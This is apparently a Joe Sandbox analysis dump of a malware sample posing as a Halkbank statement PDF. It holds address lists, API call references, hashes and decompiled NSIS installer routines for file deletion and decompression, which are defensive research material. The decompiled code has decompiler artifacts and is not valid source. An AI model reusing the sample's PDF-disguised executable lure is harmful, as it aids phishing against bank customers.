                                          0x00403aa2
                                          0x00403aaf
                                          0x00403ab7
                                          0x00403abe
                                          0x00403ac6
                                          0x00403ac6
                                          0x00403ad3
                                          0x00403adf
                                          0x00403ae9
                                          0x00403ae9
                                          0x00403aeb
                                          0x00403af2
                                          0x00403afc
                                          0x00403b08
                                          0x00403b0e
                                          0x00403b14
                                          0x00403b17
                                          0x00403b21
                                          0x00403b27
                                          0x00403b29
                                          0x00403b2d
                                          0x00403b3e
                                          0x00403b44
                                          0x00403b49
                                          0x00403b4b
                                          0x00403b4e
                                          0x00403b54
                                          0x00403b54
                                          0x00403b4b
                                          0x00403b29
                                          0x00403b57
                                          0x00403b5e
                                          0x00403b5e
                                          0x00403b5e
                                          0x00403b5e
                                          0x00403b65
                                          0x00000000
                                          0x00403b65
                                          0x00403a97
                                          0x00403a1b
                                          0x00403a1e
                                          0x00403a22
                                          0x00403a27
                                          0x00403a29
                                          0x00000000
                                          0x00000000
                                          0x00403a35
                                          0x00403a40
                                          0x00403a45
                                          0x00000000
                                          0x00403a45
                                          0x004039c3
                                          0x004039db
                                          0x004039ec
                                          0x004039ed
                                          0x004039f1
                                          0x004039f3
                                          0x00403a01
                                          0x00403a08
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403a08
                                          0x00403a0a
                                          0x00000000
                                          0x00403a0a
                                          0x0040392d
                                          0x00403939
                                          0x0040393e
                                          0x00403943
                                          0x00403945
                                          0x00000000
                                          0x00000000
                                          0x0040394d
                                          0x00403955
                                          0x00403966
                                          0x0040396e
                                          0x00403970
                                          0x00403975
                                          0x00403977
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403977
                                          0x00000000
                                          0x004038d4
                                          0x0040387d
                                          0x0040387f
                                          0x00000000
                                          0x00000000
                                          0x00403881
                                          0x00403885
                                          0x00403889
                                          0x00403890
                                          0x00403890
                                          0x00403890
                                          0x00403890
                                          0x00000000
                                          0x00403890
                                          0x0040388b
                                          0x0040388e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040388e
                                          0x00403827
                                          0x0040382b
                                          0x0040382e
                                          0x00403835
                                          0x00403835
                                          0x00000000
                                          0x00403835
                                          0x00403830
                                          0x00403833
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403833
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403801
                                          0x00403801
                                          0x00403802
                                          0x00403803
                                          0x00403803
                                          0x00000000
                                          0x00403801
                                          0x00000000

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                          • GetVersionExW.KERNEL32(?), ref: 0040368C
                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                          • OleInitialize.OLE32(00000000), ref: 0040377D
                                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                          • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                          • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                            • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                          • ExitProcess.KERNEL32(?), ref: 00403B6C
                                          • OleUninitialize.OLE32(?), ref: 00403B71
                                          • ExitProcess.KERNEL32 ref: 00403B8B
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                          • ExitWindowsEx.USER32 ref: 00403BFE
                                          • ExitProcess.KERNEL32 ref: 00403C1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                          • String ID: "C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                          • API String ID: 2292928366-615597398
                                          • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                          • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                          • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                          • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                          C-Code - Quality: 98%
                                          			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                          0x00405d7e
                                          0x00405d83
                                          0x00405d8c
                                          0x00405d8f
                                          0x00405d97
                                          0x00405d9a
                                          0x00405d9d
                                          0x00405da5
                                          0x00405da7
                                          0x00405da8
                                          0x00000000
                                          0x00405da8
                                          0x00405db3
                                          0x00405db6
                                          0x00405db6
                                          0x00405db6
                                          0x00405dba
                                          0x00405dcd
                                          0x00405dd4
                                          0x00405dd9
                                          0x00405ddd
                                          0x00405ded
                                          0x00405ddf
                                          0x00405de5
                                          0x00405de5
                                          0x00405df2
                                          0x00405df6
                                          0x00405e02
                                          0x00405e08
                                          0x00405e0d
                                          0x00405e13
                                          0x00405e1e
                                          0x00405e24
                                          0x00405e26
                                          0x00405e29
                                          0x00405ed3
                                          0x00405ed3
                                          0x00405ed7
                                          0x00405ed9
                                          0x00405ed9
                                          0x00405ed9
                                          0x00405ed9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405e2f
                                          0x00405e2f
                                          0x00405e2f
                                          0x00405e37
                                          0x00405e57
                                          0x00405e5f
                                          0x00405e64
                                          0x00405e6b
                                          0x00405e86
                                          0x00405e8b
                                          0x00405e8d
                                          0x00405eb1
                                          0x00405e8f
                                          0x00405e8f
                                          0x00405e92
                                          0x00405ea6
                                          0x00405e94
                                          0x00405e97
                                          0x00405e9f
                                          0x00405e9f
                                          0x00405e92
                                          0x00405e6d
                                          0x00405e73
                                          0x00405e75
                                          0x00405e7b
                                          0x00405e7b
                                          0x00405e75
                                          0x00000000
                                          0x00405e6b
                                          0x00405e39
                                          0x00405e41
                                          0x00000000
                                          0x00000000
                                          0x00405e43
                                          0x00405e4b
                                          0x00000000
                                          0x00000000
                                          0x00405e4d
                                          0x00405e55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405eb6
                                          0x00405ebe
                                          0x00405ec4
                                          0x00405ec4
                                          0x00405ecd
                                          0x00000000
                                          0x00405ecd
                                          0x00405df8
                                          0x00405e00
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405dbc
                                          0x00405dbc
                                          0x00405dbe
                                          0x00405ede
                                          0x00405ee0
                                          0x00405ee3
                                          0x00405f34
                                          0x00405f34
                                          0x00405f34
                                          0x00405ee5
                                          0x00405ee8
                                          0x00405ef3
                                          0x00405ef8
                                          0x00405efa
                                          0x00000000
                                          0x00000000
                                          0x00405efd
                                          0x00405f09
                                          0x00405f0e
                                          0x00405f10
                                          0x00000000
                                          0x00405f2b
                                          0x00405f12
                                          0x00405f15
                                          0x00000000
                                          0x00000000
                                          0x00405f1a
                                          0x00000000
                                          0x00405f21
                                          0x00405eea
                                          0x00405eea
                                          0x00000000
                                          0x00405eea
                                          0x00405dc4
                                          0x00405dc7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405dc7

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc9364.tmp\*.*,\*.*), ref: 00405DE5
                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsc9364.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsc9364.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsc9364.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                          • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsc9364.tmp\*.*$\*.*
                                          • API String ID: 2035342205-34752259
                                          • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                          • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                          • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                          • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                                          C-Code - Quality: 98%
                                          			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
